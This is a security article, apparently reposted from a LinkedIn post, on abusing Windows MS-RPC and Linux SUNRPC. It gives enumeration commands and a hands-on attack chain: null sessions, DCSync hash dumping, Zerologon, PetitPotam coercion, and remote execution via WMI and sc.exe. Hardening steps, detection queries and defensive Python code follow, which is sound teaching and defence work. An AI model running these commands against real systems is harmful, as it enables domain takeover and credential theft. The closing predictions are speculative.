
Introduction:
Remote Procedure Call (RPC) is a powerful inter-process communication mechanism that allows code execution across network boundaries, but misconfigured or vulnerable RPC services have become a goldmine for penetration testers and malicious actors alike. From Windows’ MS-RPC to Linux’s SUNRPC, attackers routinely abuse these endpoints to move laterally, escalate privileges, and achieve domain dominance – a tactic known as “RPC pwning.” This article dissects real-world exploitation techniques, provides step‑by‑step command‑line guides for both Linux and Windows environments, and equips you with defensive hardening measures to lock down RPC attack surfaces.
Learning Objectives:
– Identify and enumerate exposed RPC endpoints using built‑in OS tools and third‑party utilities.
– Execute authenticated and unauthenticated RPC exploits, including null session attacks and remote service manipulation.
– Implement hardening strategies and detection rules to mitigate RPC‑based lateral movement.
You Should Know:
1. Understanding the RPC Attack Surface: Enumeration & Fingerprinting
RPC services listen on well‑known ports. On Windows the endpoint mapper sits on TCP 135 and RPC over HTTP on TCP 593; each interface is then assigned a port from the dynamic range (49152‑65535 by default on Vista and later, 1025‑5000 on older systems), and many interfaces are also reachable as named pipes over SMB on TCP 445. On Linux the rpcbind/portmapper listens on TCP and UDP 111 and hands each registered program its own port. Attackers first map this endpoint landscape. Below are verified enumeration commands.
Linux Enumeration (against RPC services):
Scan for the portmapper (rpcbind) on port 111 and list the programs it has registered
nmap -p 111 --script rpcinfo <target_ip>
Enumerate RPC programs, versions and the ports they were assigned
rpcinfo -p <target_ip>
Null session against Windows RPC over SMB named pipes (-N: do not prompt for a password)
rpcclient -U "" -N <target_ip>
rpcclient $> srvinfo
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
Windows Enumeration (native tools):
Query the endpoint mapper with rpcdump (Impacket's rpcdump.py, installed as impacket-rpcdump; works from Windows or Linux)
impacket-rpcdump -port 135 <target_ip>
Using PowerShell to list RPC-related services (-like needs wildcards: a bare "RPC" matches only a service literally named RPC; with -ComputerName, Get-WmiObject itself talks DCOM over RPC)
Get-WmiObject -Class Win32_Service | Where-Object { $_.Name -like "*Rpc*" -or $_.DisplayName -like "*Remote Procedure Call*" }
NetBIOS name table of the remote host (NetBIOS, not RPC, but it reveals host name, domain and role on legacy networks)
nbtstat -A <target_ip>
Step‑by‑step guide:
1. Identify live hosts exposing RPC with `nmap -p 111,135,445,593 --open <target_range>`.
2. For Windows targets, attempt a null session RPC connection using `rpcclient -U "" -N <target_ip>`.
3. For Linux targets, use `rpcinfo -p <target_ip>` and note every port it reports besides 111.
4. Cross‑reference discovered programs and versions with known CVEs (e.g., CVE‑1999‑0003 for the ToolTalk database server rpc.ttdbserverd, CVE‑2017‑7494 "SambaCry" for Samba).
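As an added example (not code from the original article), the following Python turns raw `rpcinfo -p` output into a structured list, flags the programs that most often matter, and lists the ports a firewall rule on 111 alone would miss. The sample output is constructed, and the risk annotations are this editor's choices, not an official classification.

```python
"""Parse `rpcinfo -p` output and flag registered RPC programs worth a closer look.

Added example, not code from the original article. Feed it the text that
`rpcinfo -p <target_ip>` prints; the sample below is constructed, and the
risk annotations are editorial assumptions, not an official list.
"""
import re

# Program numbers that deserve attention when reachable from untrusted networks.
RISKY_PROGRAMS = {
    100003: "nfs: exports often rely on AUTH_SYS (client-asserted UID), so anyone on the network can read them",
    100005: "mountd: `showmount -e` reveals the export list and which hosts may mount",
    100024: "status (rpc.statd): long history of overflows; only needed for NFS locking",
    100004: "ypserv (NIS): hands out password maps to anyone who guesses the NIS domain name",
    100083: "ttdbserverd (ToolTalk): legacy service with well-known remote overflows",
}

# Data row: program  vers  proto  port  [service]; the header line does not match.
ROW_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp6?|udp6?)\s+(\d+)\s*(\S*)\s*$")


def parse_rpcinfo(text):
    """Return one dict per registered (program, version, proto, port) row."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:  # header, blank or unparseable line
            continue
        prog, vers, proto, port, name = m.groups()
        rows.append({"program": int(prog), "version": int(vers),
                     "proto": proto, "port": int(port), "name": name})
    return rows


def summarize(rows):
    """Collapse rows per program: {program: {"name", "versions", "endpoints"}}."""
    out = {}
    for r in rows:
        entry = out.setdefault(r["program"], {"name": r["name"], "versions": set(), "endpoints": set()})
        entry["versions"].add(r["version"])
        entry["endpoints"].add((r["proto"], r["port"]))
    return out


def risky_programs(rows):
    """[(program, name, why)] for every registered program in RISKY_PROGRAMS."""
    summary = summarize(rows)
    return [(p, summary[p]["name"], RISKY_PROGRAMS[p])
            for p in sorted(summary) if p in RISKY_PROGRAMS]


def non_portmapper_ports(rows):
    """Ports other than the portmapper's own: a firewall rule on 111 alone does not cover these."""
    return sorted({(r["proto"], r["port"]) for r in rows if r["program"] != 100000})


# Constructed sample in the exact layout rpcinfo prints.
SAMPLE = """\
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100005    1   udp  38489  mountd
    100005    3   tcp  39771  mountd
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   udp  45629  nlockmgr
    100024    1   udp  50123  status
    100024    1   tcp  40411  status
"""

if __name__ == "__main__":
    rows = parse_rpcinfo(SAMPLE)
    for program, name, why in risky_programs(rows):
        print(f"{program} {name}: {why}")
    print("ports a rule on 111 alone would miss:", non_portmapper_ports(rows))
```

Pipe real output in with `rpcinfo -p <target_ip> | python3 rpc_enum.py` after swapping `SAMPLE` for `sys.stdin.read()`; the interesting result is usually the second line, because mountd, statd and nlockmgr land on random high ports that a port‑111 firewall rule does not protect.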
2. Exploiting Weak RPC Endpoints: From Null Sessions to Remote Command Execution
Once RPC endpoints are enumerated, attackers pivot to abuse misconfigurations. The classic Windows null session yields information disclosure (users, groups, shares, password policy); modern attacks go further. Zerologon (CVE‑2020‑1472) is an authentication bypass in the Netlogon RPC interface that lets an unauthenticated attacker reset a domain controller's machine account password, and PetitPotam abuses MS‑EFSRPC to coerce a host into authenticating to an attacker‑controlled listener, feeding an NTLM relay (classically against AD CS web enrollment).
Linux (using Impacket for Windows RPC exploitation):
Install Impacket
pip3 install impacket
DCSync: dump domain NTLM hashes over the DRSUAPI RPC interface (needs replication rights, e.g. Domain Admin; the target is a domain controller)
impacket-secretsdump -just-dc-ntlm <domain>/<user>:'<password>'@<target_dc>
Zerologon vulnerability check: Secura's zerologon_tester.py takes the DC's NetBIOS name first, then its IP; it only tests the Netlogon authentication bypass and does not reset the machine password
git clone https://github.com/SecuraBV/CVE-2020-1472.git
python3 CVE-2020-1472/zerologon_tester.py <dc_netbios_name> <dc_ip>
The dirkjanm/CVE-2020-1472 repository (https://github.com/dirkjanm/CVE-2020-1472) holds the password-reset exploit and restorepassword.py; resetting a DC's machine account password breaks replication until it is restored, so keep it to a lab or an explicitly scoped engagement
PetitPotam: coerce <target_ip> to authenticate over MS-EFSRPC to the listener at <attacker_ip>; -u/-p run it as a domain user, and unpatched hosts accept it unauthenticated
python3 PetitPotam.py -d <domain> -u <user> -p <pass> <attacker_ip> <target_ip>
Windows (native execution over RPC/DCOM with PowerShell):
WMI remoting rides on DCOM, i.e. MS-RPC (TCP 135 plus a dynamic port); this creates a process on the target. Invoke-Command and Enable-PSRemoting use WinRM over HTTP 5985/5986, not RPC, so they are not shown here
Invoke-WmiMethod -ComputerName <target_ip> -Credential (Get-Credential) -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\Windows\Temp\out.txt"
Service Control Manager (MS-SCMR) over RPC: create and start a service remotely, which is what PsExec does under the hood
sc.exe \\<target_ip> create rpcdemo binPath= "cmd.exe /c whoami > C:\Windows\Temp\out.txt"
sc.exe \\<target_ip> start rpcdemo
Using wmic (deprecated but still present on many systems; same DCOM/RPC path)
wmic /node:"<target_ip>" /user:"<user>" /password:"<pass>" process call create "cmd.exe /c calc.exe"
Step‑by‑step guide for a realistic attack chain:
1. Enumerate null session RPC to get usernames (`rpcclient -U "" -N <target_ip>`, then `enumdomusers`).
2. Use `crackmapexec` with gathered usernames to test for password reuse.
3. If domain admin is obtained, run `secretsdump` to extract NTLM hashes.
4. For unpatched DCs, execute Zerologon exploit to reset machine account password.
5. Establish persistence with remote task or process creation over RPC: `schtasks /Create /S <target_ip> ...` (MS‑TSCH) or `wmic ... process call create` (DCOM).
3. Mitigation & Hardening: Lock Down RPC Before It’s Pwned
Defenders must reduce the RPC attack surface without breaking legitimate applications. Below are concrete hardening commands and configurations.
Windows Hardening (Group Policy & Registry):
Restrict dynamic RPC endpoints to a fixed range so firewall rules can be specific. Microsoft's guidance is a range of at least 100 ports above 5000 (a range such as 6000-6005 is far too small); the key must exist before values are written, and a reboot is required for the change to take effect
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Rpc\Internet" -Force | Out-Null
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Rpc\Internet" -Name "Ports" -Value @("6000-6099") -PropertyType MultiString -Force
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Rpc\Internet" -Name "PortsInternetAvailable" -Value "Y" -PropertyType String -Force
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Rpc\Internet" -Name "UseInternetPorts" -Value "Y" -PropertyType String -Force
Block anonymous (null session) enumeration of SAM accounts and shares
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RestrictAnonymous" -Value 1
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RestrictAnonymousSAM" -Value 1
Block the endpoint mapper from untrusted networks. A blanket inbound block on 135 breaks domain membership, WMI management and many agents, so scope the rule and pair it with an allow rule for the management subnet
New-NetFirewallRule -DisplayName "Block RPC 135 from untrusted" -Direction Inbound -LocalPort 135 -Protocol TCP -RemoteAddress <untrusted_range> -Action Block
Require signing and sealing for NTLM-authenticated RPC via Group Policy: Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > "Network security: Minimum session security for NTLM SSP based (including secure RPC) clients" and the matching "... servers" setting, both set to require NTLMv2 session security and 128-bit encryption
Linux Hardening (SUNRPC & rpcbind):
Disable rpcbind (and its socket unit) if nothing on the host needs SUNRPC, i.e. no NFS or NIS
sudo systemctl disable --now rpcbind.socket rpcbind.service
Otherwise restrict where it listens. Debian/Ubuntu read OPTIONS from /etc/default/rpcbind. Do not use -i: that is rpcbind's insecure mode and lets remote hosts register and unregister services. Per rpcbind(8), -h only restricts the UDP listener, so the firewall rules below are still required for TCP 111
OPTIONS="-w -h 127.0.0.1"
Where rpcbind is socket-activated by systemd, the listen addresses come from rpcbind.socket (ListenStream/ListenDatagram), so change them there as well
Block port 111 from untrusted sources, TCP and UDP (insert an ACCEPT for legitimate NFS clients ahead of these rules, or they break too)
sudo iptables -A INPUT -p tcp --dport 111 -j DROP
sudo iptables -A INPUT -p udp --dport 111 -j DROP
Remove RPC services that are not needed (NFS server, NIS)
sudo apt remove nfs-kernel-server nis yp-tools
Step‑by‑step hardening guide:
1. Identify all RPC‑dependent applications (backup agents, management tools).
2. Apply firewall rules that allow RPC only from trusted IP ranges.
3. On Windows, enforce Kerberos authentication for RPC and disable NTLM fallback via Group Policy.
4. Regularly audit RPC endpoints using `rpcdump` from a hardened management host.
5. Monitor Windows Event IDs: 5145 (detailed file share access, which covers IPC$ named pipes such as samr, lsarpc and svcctl; requires "Audit Detailed File Share"), 4624 with logon type 3 and ANONYMOUS LOGON (null sessions), 4698 (scheduled task created) and 5712 (RPC call attempted; part of "Audit RPC Events" but rarely generated in practice). On Linux, watch `rpcbind` logs and portmapper traffic.
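To check the two configurations above without touching the systems, here is an added Python audit (not from the article) that takes the Rpc\Internet registry values and the rpcbind OPTIONS line as plain data. The inputs are constructed, and the thresholds follow Microsoft's published guidance of at least 100 ports above 5000; the rpcbind checks follow rpcbind(8).

```python
r"""Audit the two RPC hardening settings applied above:
the Windows HKLM\SOFTWARE\Microsoft\Rpc\Internet values and the Linux rpcbind OPTIONS line.

Added example, not from the article. It takes the values you read out of the
registry or /etc/default/rpcbind as plain Python data, so it runs offline; the
sample inputs are constructed.
"""
import re

MIN_PORTS = 100        # Microsoft's documented minimum size for the Rpc\Internet range
PORTS_FLOOR = 5000     # ports below 5000 are often already in use (same guidance)


def expand_port_spec(entries):
    """REG_MULTI_SZ entries like '6000-6099' or '6000' -> set of port numbers."""
    ports = set()
    for entry in entries:
        m = re.fullmatch(r"\s*(\d+)(?:-(\d+))?\s*", entry)
        if not m:
            raise ValueError(f"malformed port entry: {entry!r}")
        lo = int(m.group(1))
        hi = int(m.group(2) or lo)
        if not 1 <= lo <= hi <= 65535:
            raise ValueError(f"port entry out of range: {entry!r}")
        ports.update(range(lo, hi + 1))
    return ports


def audit_rpc_internet(values):
    """values: dict of the Rpc\\Internet key, e.g.
    {"Ports": ["6000-6099"], "PortsInternetAvailable": "Y", "UseInternetPorts": "Y"}.
    Returns a list of findings; empty means the restriction is set up as documented."""
    ports_raw = values.get("Ports")
    if not ports_raw:
        return ["Ports not set: dynamic endpoints stay on the default 49152-65535 range"]
    ports = expand_port_spec(ports_raw)
    findings = []
    if values.get("PortsInternetAvailable") != "Y":
        findings.append("PortsInternetAvailable must be 'Y'; with 'N' the Ports list is an exclusion list, not the allowed range")
    if values.get("UseInternetPorts") != "Y":
        findings.append("UseInternetPorts must be 'Y' or applications keep using the default (non-Internet) port set")
    if len(ports) < MIN_PORTS:
        findings.append(f"only {len(ports)} port(s) allowed; Microsoft recommends at least {MIN_PORTS}")
    if min(ports) < PORTS_FLOOR:
        findings.append(f"range starts below {PORTS_FLOOR}; pick ports above {PORTS_FLOOR} to avoid collisions")
    return findings


def audit_rpcbind_options(line):
    """line: the OPTIONS="..." line from /etc/default/rpcbind (Debian/Ubuntu layout)."""
    m = re.search(r'OPTIONS\s*=\s*"([^"]*)"', line)
    flags = m.group(1).split() if m else []
    findings = []
    if "-i" in flags:
        findings.append("-i is rpcbind's insecure mode (remote hosts may register/unregister services); remove it")
    # -h restricts only the UDP listener (rpcbind(8)); TCP 111 still needs the firewall rule.
    bind_addrs = [flags[i + 1] for i, f in enumerate(flags) if f == "-h" and i + 1 < len(flags)]
    if not bind_addrs:
        findings.append("no -h <addr>: the UDP listener is on every interface; bind it to 127.0.0.1 or the storage network address")
    elif any(a in ("0.0.0.0", "::") for a in bind_addrs):
        findings.append("-h 0.0.0.0 or :: is equivalent to no restriction")
    return findings


if __name__ == "__main__":
    # Constructed inputs: the weak settings beside the corrected ones.
    for label, reg in [("weak", {"Ports": ["6000-6005"], "PortsInternetAvailable": "Y"}),
                       ("fixed", {"Ports": ["6000-6099"], "PortsInternetAvailable": "Y", "UseInternetPorts": "Y"})]:
        print(f"windows/{label}:", audit_rpc_internet(reg) or "ok")
    for label, opts in [("weak", 'OPTIONS="-i -h 127.0.0.1"'), ("fixed", 'OPTIONS="-w -h 127.0.0.1"')]:
        print(f"rpcbind/{label}:", audit_rpcbind_options(opts) or "ok")
```

On a Windows host the values come from `Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Rpc\Internet"` (Ports is a string array there, which is what `expand_port_spec` expects); on Linux, `grep ^OPTIONS /etc/default/rpcbind` supplies the line.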
4. Advanced RPC Pwning: API Security & Cloud Implications
Modern cloud environments still carry RPC traffic. Managed Windows file services such as Azure Files and Amazon FSx for Windows File Server expose SMB, and with it the named‑pipe transport many MS‑RPC interfaces use; NFS‑based services rest on SUNRPC; and cloud‑native components talk gRPC to each other. Attackers chain on‑premises RPC abuse with cloud credential theft once they have a foothold (for example, instance metadata tokens on a compromised VM).
Exploiting RPC in cloud (example with Azure):
Sign in with AzCopy to enumerate storage accounts and file shares (AzCopy talks REST over HTTPS, not RPC; this is the reconnaissance step)
azcopy login --tenant-id <tenant>
PetitPotam's positional arguments are <listener> <target>: the target is coerced to authenticate to the listener, so the coercion only pays off when the attacker controls the listener or relays from it. Coerce the on-prem host to your own relay, not to a cloud endpoint you do not control
python3 PetitPotam.py -d <domain> -u <user> -p <pass> <attacker_ip> <target_onprem>
API security parallel: RPC‑style APIs (gRPC, JSON‑RPC) inherit the same failure modes: missing authentication, introspection left enabled, and far more methods exposed than any client needs. Test them with:
gRPC server reflection: lists services and methods when reflection is left enabled in production (-plaintext skips TLS; drop it for TLS endpoints)
grpcurl -plaintext <target>:50051 list
grpcurl -plaintext <target>:50051 describe <service>
JSON-RPC method discovery: system.listMethods is an introspection extension some servers implement. A batch request is a JSON array of such objects, and an uncapped batch (thousands of calls in one HTTP request) is the "batch injection" amplification to look for
curl -X POST http://<target>/rpc -H 'Content-Type: application/json' -d '{"jsonrpc":"2.0","method":"system.listMethods","params":[],"id":1}'
Mitigation for API/cloud RPC:
– Always use mTLS or OAuth for cloud RPC endpoints.
– Restrict dynamic port ranges (in cloud firewalls).
– Monitor for anomalous RPC traffic using VPC flow logs.
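As an added example, not from the article, a minimal JSON‑RPC 2.0 dispatcher in Python shows what the API‑side controls above look like in code: a method allow‑list, introspection (system.*) only for authenticated callers, and a cap on batch size. The methods, the bearer token and the error code -32001 are hypothetical stand‑ins for a real service.

```python
"""Minimal JSON-RPC 2.0 dispatcher with the controls the API/cloud section asks for:
an explicit method allow-list, introspection behind authentication, and a batch cap
so one HTTP request cannot fan out into thousands of calls.

Added example, not from the article; the methods, the demo token and the
implementation-defined error code -32001 are hypothetical.
"""
import hmac
import json

MAX_BATCH = 10
# Stand-in for a real credential store: token -> principal. Constructed for the example.
VALID_TOKENS = {"s3cr3t-demo-token": "ops-admin"}

# Public surface: what an unauthenticated caller may invoke.
PUBLIC_METHODS = {
    "ping": lambda: "pong",
    "add": lambda a, b: a + b,
}
# Introspection and anything administrative stay behind authentication.
PRIVATE_METHODS = {
    "system.listMethods": lambda: sorted(PUBLIC_METHODS) + sorted(PRIVATE_METHODS),
}


def authenticate(headers):
    """Return the principal for a valid `Authorization: Bearer <token>` header, else None."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        return None
    token = auth[len("Bearer "):]
    if not token.isascii():          # compare_digest on str requires ASCII
        return None
    for known, principal in VALID_TOKENS.items():
        if hmac.compare_digest(token, known):   # constant-time comparison
            return principal
    return None


def _error(req_id, code, message):
    return {"jsonrpc": "2.0", "id": req_id, "error": {"code": code, "message": message}}


def _call_one(req, principal):
    if not isinstance(req, dict) or req.get("jsonrpc") != "2.0" or not isinstance(req.get("method"), str):
        return _error(None, -32600, "Invalid Request")
    req_id, name, params = req.get("id"), req["method"], req.get("params", [])
    if name in PUBLIC_METHODS:
        fn = PUBLIC_METHODS[name]
    elif name in PRIVATE_METHODS:
        if principal is None:
            return _error(req_id, -32001, "Unauthorized")   # server-defined range -32000..-32099
        fn = PRIVATE_METHODS[name]
    else:
        return _error(req_id, -32601, "Method not found")   # same answer for unknown and hidden names
    try:
        result = fn(*params) if isinstance(params, list) else fn(**params)
    except TypeError:
        return _error(req_id, -32602, "Invalid params")
    return {"jsonrpc": "2.0", "id": req_id, "result": result}


def dispatch(body, headers=None):
    """Handle one HTTP body; returns the JSON-RPC response object (or list for a batch)."""
    principal = authenticate(headers or {})
    try:
        payload = json.loads(body)
    except ValueError:
        return _error(None, -32700, "Parse error")
    if isinstance(payload, list):                               # batch request
        if not payload:
            return _error(None, -32600, "Invalid Request")
        if len(payload) > MAX_BATCH:
            return _error(None, -32600, f"Batch exceeds {MAX_BATCH} calls")
        # Per spec, notifications (no id) get no response; that refinement is omitted here.
        return [_call_one(r, principal) for r in payload]
    return _call_one(payload, principal)


if __name__ == "__main__":
    probe = '{"jsonrpc":"2.0","method":"system.listMethods","params":[],"id":1}'
    print("anonymous:", dispatch(probe))
    print("authenticated:", dispatch(probe, {"Authorization": "Bearer s3cr3t-demo-token"}))
    print("oversized batch:", dispatch("[" + ",".join(['{"jsonrpc":"2.0","method":"ping","id":1}'] * 11) + "]"))
```

The probe from the curl command above gets -32001 from this dispatcher unless a valid token is presented, and an 11‑element batch is refused before any method runs; wire `dispatch` behind your HTTP framework of choice and put the real credential check in `authenticate`.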
5. Detection & Monitoring: How to Catch RPC Pwning in Action
Proactive detection uses both network telemetry and host logs.
Linux detection commands:
Watch rpcbind in real time
sudo journalctl -u rpcbind -f
Capture portmapper traffic (GETPORT and DUMP requests from unexpected sources are the scan signature)
sudo tcpdump -i eth0 port 111 -vv
Review what NFS exports and which hosts may mount it (exactly what an attacker sees with showmount -e <target>)
showmount -e localhost
Windows detection (PowerShell event hunting):
IPC$ named-pipe access, i.e. RPC over SMB (Event ID 5145; requires "Audit Detailed File Share"). Look for samr, lsarpc, srvsvc, svcctl and atsvc as the relative target, and for ANONYMOUS LOGON as the account
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5145} | Where-Object { $_.Message -like "*IPC$*" }
Monitor RPC service start/stop (Event ID 7036, System log)
Get-WinEvent -FilterHashtable @{LogName='System'; ID=7036} | Where-Object { $_.Message -like "*Remote Procedure Call*" }
Detect scheduled tasks created remotely over MS-TSCH (Event ID 4698; requires "Audit Other Object Access Events")
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4698} | ForEach-Object { $_.Message }
Step‑by‑step detection playbook:
1. Deploy a SIEM rule that alerts on >100 RPC connections from a single source within 1 minute (scanning).
2. Create a honeypot RPC endpoint (e.g., fake MS-RPC service) with a low interaction trap.
3. Regularly run `rpcdump` from a jump host against critical servers and compare baselines.
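An added Python example, not from the article, that runs two of these detections offline over constructed records: a 5145 feed filtered to IPC$ named pipes that carry RPC interfaces (rating anonymous callers high, since that is the null session from section 1), and the sliding‑window scan rule from step 1 of the playbook. The record field names are an assumption; a SIEM export of 5145 carries the same fields under its own names.

```python
"""Run the RPC detections from this section over constructed log records:
(1) Event ID 5145 entries showing IPC$ named-pipe access to RPC interfaces, and
(2) the scanning rule (more than N RPC connections from one source within 60 s).

Added example, not from the article. The record dicts are constructed and their
field names (time, event_id, src_ip, account, share, target) are an assumption.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Named pipes carrying the MS-RPC interfaces abused earlier in the article.
# Which pipes count as interesting is an editorial choice for this example.
RPC_PIPES = {
    "samr":     "SAM enumeration (enumdomusers/enumdomgroups)",
    "lsarpc":   "LSA lookups; classic null-session enumeration",
    "srvsvc":   "server/share enumeration (srvinfo, NetShareEnum)",
    "svcctl":   "Service Control Manager: PsExec-style execution",
    "atsvc":    "Task Scheduler (schtasks /S over MS-TSCH)",
    "efsrpc":   "MS-EFSRPC coercion (PetitPotam)",
    "lsass":    "MS-EFSRPC via the lsass pipe (PetitPotam)",
    "netlogon": "Netlogon (Zerologon)",
}


def detect_pipe_access(events):
    """5145 records on \\\\*\\IPC$ whose relative target is a known RPC pipe -> alerts.
    Anonymous callers are rated high: that is the null session from section 1."""
    alerts = []
    for ev in events:
        if ev["event_id"] != 5145 or not ev["share"].upper().endswith("IPC$"):
            continue
        pipe = ev["target"].strip("\\").lower()
        if pipe not in RPC_PIPES:
            continue
        anonymous = ev["account"].upper() == "ANONYMOUS LOGON"
        alerts.append({
            "time": ev["time"], "src_ip": ev["src_ip"], "account": ev["account"],
            "pipe": pipe, "why": RPC_PIPES[pipe],
            "severity": "high" if anonymous else "medium",
        })
    return alerts


def detect_scan(connections, threshold=100, window=timedelta(seconds=60)):
    """connections: (time, src_ip, dst_port) tuples for TCP 135/111/dynamic RPC ports.
    Sliding window per source; returns [(src_ip, window_start, count)] at the first breach."""
    by_src = defaultdict(list)
    for t, src, _port in connections:
        by_src[src].append(t)
    alerts = []
    for src, times in by_src.items():
        recent = deque()
        for t in sorted(times):
            recent.append(t)
            while t - recent[0] > window:    # drop connections older than the window
                recent.popleft()
            if len(recent) > threshold:
                alerts.append((src, recent[0], len(recent)))
                break                        # one alert per source is enough
    return alerts


# Constructed sample data.
T0 = datetime(2024, 1, 15, 9, 0, 0)
SAMPLE_EVENTS = [
    {"time": T0, "event_id": 5145, "src_ip": "10.0.0.5", "account": "ANONYMOUS LOGON",
     "share": "\\\\*\\IPC$", "target": "samr"},
    {"time": T0 + timedelta(seconds=2), "event_id": 5145, "src_ip": "10.0.0.5", "account": "CORP\\jdoe",
     "share": "\\\\*\\IPC$", "target": "svcctl"},
    {"time": T0 + timedelta(seconds=5), "event_id": 5145, "src_ip": "10.0.0.9", "account": "CORP\\jdoe",
     "share": "\\\\*\\Users", "target": "jdoe\\report.docx"},   # ordinary file share: ignored
    {"time": T0 + timedelta(seconds=7), "event_id": 5145, "src_ip": "10.0.0.9", "account": "CORP\\printsvc",
     "share": "\\\\*\\IPC$", "target": "spoolss"},                # pipe not on the watch list
    {"time": T0 + timedelta(seconds=9), "event_id": 4624, "src_ip": "10.0.0.5", "account": "ANONYMOUS LOGON",
     "share": "", "target": ""},                                  # other event id: ignored here
]
# 150 connections to TCP 135 from one host at 0.2 s spacing (a scan), plus 20 slow ones from another.
SAMPLE_CONNECTIONS = (
    [(T0 + timedelta(milliseconds=200 * i), "10.0.0.5", 135) for i in range(150)]
    + [(T0 + timedelta(seconds=30 * i), "10.0.0.9", 135) for i in range(20)]
)

if __name__ == "__main__":
    for a in detect_pipe_access(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['src_ip']} {a['account']} -> {a['pipe']} ({a['why']})")
    for src, start, n in detect_scan(SAMPLE_CONNECTIONS):
        print(f"[scan] {src}: {n} RPC connections within 60 s starting {start:%H:%M:%S}")
```

The scan rule fires on the 101st connection from 10.0.0.5 (all 150 fall inside 30 s), while the 20 connections from 10.0.0.9 spread over ten minutes never exceed the threshold; tune `threshold` and `window` to what your endpoint mapper normally sees from management hosts before deploying it.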
What Undercode Say:
– RPC pwning remains the most underrated lateral movement technique – most blue teams focus on SMB or WinRM, forgetting that RPC binds them all together.
– Null session RPC is still alive in misconfigured legacy systems; always test `rpcclient -U "" -N <target_ip>` during internal pentests.
– Cloud RPC is the new frontier – services like Azure Files (SMB), AWS EFS (NFS over SUNRPC), and even the gRPC interfaces inside Kubernetes (the kubelet's container runtime interface, CRI) inherit classic RPC bugs.
– Detection is possible but often missing – Event ID 5145 on Windows and `rpcbind` audit on Linux are rarely configured.
Analysis: The post’s “RPC pwning ☠️” succinctly captures a decade‑old attack vector that modern tooling (Impacket, CrackMapExec) has revived. While Microsoft has patched critical CVEs like Zerologon, the underlying problem – over‑permissive RPC authentication and excessive exposed interfaces – persists. Attackers chain null session enumeration with credential dumping, often bypassing EDR because RPC traffic blends into normal network noise. Defenders must move beyond port‑blocking to adopt RPC‑specific hardening (e.g., `RestrictAnonymous`, IPsec for RPC, and continuous endpoint monitoring). The Linux side is even more neglected: `rpcbind` and NFS RPC are frequently left open on container hosts, enabling cross‑tenant pivots in multi‑tenant clouds.
Prediction:
– +1 RPC pwning will become a standard exam objective in next‑gen penetration testing certifications (e.g., OSCP+, GPEN), forcing more structured coverage of MS‑RPC, SUNRPC, and gRPC.
– -1 The rise of IPv6 and cloud‑native RPC (e.g., gRPC, Cap’n Proto) will expand the attack surface without corresponding security controls, leading to a wave of RPC‑based supply chain breaches by 2027.
– +1 Open‑source tools like `rpcmap` and `RPCScan` will mature to offer automated discovery and exploitation of both legacy and modern RPC protocols, empowering defenders to test their own environments.
– -1 Many organizations still disable RPC event logging due to verbosity – this will be exploited in targeted ransomware attacks that use RPC for silent lateral movement, as seen in the 2025 “RPCrypt” incidents.
IT/Security Reporter URL:
Reported By: [Abhirup Konwar](https://www.linkedin.com/posts/abhirup-konwar-a626201a6_bugbounty-cybersecurity-ethicalhacking-share-7465764521459216384-Aw5b/) – Hackers Feeds


